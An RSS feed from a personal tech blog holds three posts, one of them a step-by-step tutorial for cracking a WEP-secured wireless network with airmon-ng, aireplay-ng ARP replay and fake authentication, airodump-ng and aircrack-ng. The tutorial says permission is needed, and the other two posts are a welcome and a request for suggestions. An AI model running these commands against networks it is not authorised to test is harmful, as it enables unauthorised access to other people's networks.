<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>JCortes Web &#187; General</title>
	<atom:link href="http://jcortesweb.com/category/general/feed/" rel="self" type="application/rss+xml" />
	<link>http://jcortesweb.com</link>
	<description>JCortes Technical Blog</description>
	<lastBuildDate>Wed, 10 Mar 2010 03:13:29 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Wireless WEP Key Hacking</title>
		<link>http://jcortesweb.com/2010/03/wireless-wep-key-hacking/</link>
		<comments>http://jcortesweb.com/2010/03/wireless-wep-key-hacking/#comments</comments>
		<pubDate>Wed, 10 Mar 2010 03:13:29 +0000</pubDate>
		<dc:creator>JCortes</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://jcortesweb.com/?p=61</guid>
		<description><![CDATA[Wireless WEP Key Hacking

NOTE: This tutorial shows how easy it is to hack a WEP  secured network it should not be replicated without the permission of  the networks owner.

log in as root
Start the  network device all devices are different so i cant walk you through it.
Put  the device in monitor mode [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Wireless WEP Key Hacking</strong></p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/TiPWUykw3uU&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/TiPWUykw3uU&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>NOTE: This tutorial shows how easy it is to hack a WEP  secured network it should not be replicated without the permission of  the networks owner.</p>
<ul>
<li>log in as root</li>
<li>Start the  network device all devices are different so i cant walk you through it.</li>
<li>Put  the device in monitor mode and start it with airmon-ng</li>
<li>monitor  the channel and even the bssid of the target network until you find a  connection to a station</li>
<li>Take note of the stations MAC address  and the BSSID</li>
<li>set up the arpreplay command below but do not hit  enter.
<ul>
<li><span style="color: #000000;">aireplay-ng &#8211;arpreplay -b [BSSID of  the network] -h [Connected clients MAC address] [Interface] </span></li>
</ul>
</li>
<li>Next  we preform a fake authentication with the network to speed up the ARP  replies.
<ul>
<li>aireplay-ng -1 0 -a [BSSID of the network] -h  [Connected clients MAC address] -e [ESSID or Network Name] [Interface]</li>
</ul>
</li>
<li>Hit  enter on the fake authentication window then right away switch to the  arpreplay window and press enter as well. If need be use Ctrl + C to  repeat this process many times. It can take up to 15 mins for the ARP  replies to come in. After which point you should try to authenticate  again.</li>
<li>Once the ARP replies start to come in open a new tab and  log them with airodump-ng
<ul>
<li>airodump-ng -c [Channel] &#8211;bssid [BSSID  of the network] -w [Capture file name] rausb0</li>
</ul>
</li>
<li>Wait  for the Data to reach 80,000-100,000 then begin the actual cracking  process.
<ul>
<li>aircrack-ng -z {This starts the PTW attack which is much  faster} [Capture file name]</li>
</ul>
</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://jcortesweb.com/2010/03/wireless-wep-key-hacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Suggestions for JCortes Web</title>
		<link>http://jcortesweb.com/2009/09/suggestions-for-jcortes-web/</link>
		<comments>http://jcortesweb.com/2009/09/suggestions-for-jcortes-web/#comments</comments>
		<pubDate>Tue, 29 Sep 2009 18:21:31 +0000</pubDate>
		<dc:creator>JCortes</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://jcortesweb.com/2009/09/suggestions-for-jcortes-web/</guid>
		<description><![CDATA[Thought I would make a post to ask you, the user, what can I do to make the site better? Features, Topics, Pages, etc. Please leave your suggestions in the comment section below.
]]></description>
			<content:encoded><![CDATA[<p>Thought I would make a post to ask you, the user, what can I do to make the site better? Features, Topics, Pages, etc. Please leave your suggestions in the comment section below.</p>
]]></content:encoded>
			<wfw:commentRss>http://jcortesweb.com/2009/09/suggestions-for-jcortes-web/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Welcome To JCortes Web!</title>
		<link>http://jcortesweb.com/2009/09/hello-world/</link>
		<comments>http://jcortesweb.com/2009/09/hello-world/#comments</comments>
		<pubDate>Mon, 28 Sep 2009 06:36:26 +0000</pubDate>
		<dc:creator>JCortes</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://jcortesweb.com/?p=1</guid>
		<description><![CDATA[As some of you may know I have taken down my old site. This is due to an overwhelming amount of  inexperienced users that were asking me to hack for them and basically wanting to have everything spoon fed to them.
I have decided that I will put up my site again except this time it [...]]]></description>
			<content:encoded><![CDATA[<p><img style="float: left; width: 75px;" src="http://alhambracomputerservices.com/images/icon%20-%20security.jpg" alt="Security Icon" />As some of you may know I have taken down my old site. This is due to an overwhelming amount of  inexperienced users that were asking me to hack for them and basically wanting to have everything spoon fed to them.</p>
<p>I have decided that I will put up my site again except this time it will not be entirely based on hacking. I will post articles on computer related things that I feel are relevant and I assure you I will go into greater detail in one of my posts about the <strong><a title="Wireless WEP Key Hacking Video" href="http://www.youtube.com/watch?v=TiPWUykw3uU" target="_blank">Wireless WEP Key Hacking</a> </strong>video when I have some time!</p>
<p>For those legitimate users that honestly needed advise I apologize I was unable to answer a majority of your questions due to the overwhelming flood of noob questions <img src='http://jcortesweb.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://jcortesweb.com/2009/09/hello-world/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
	</channel>
</rss>
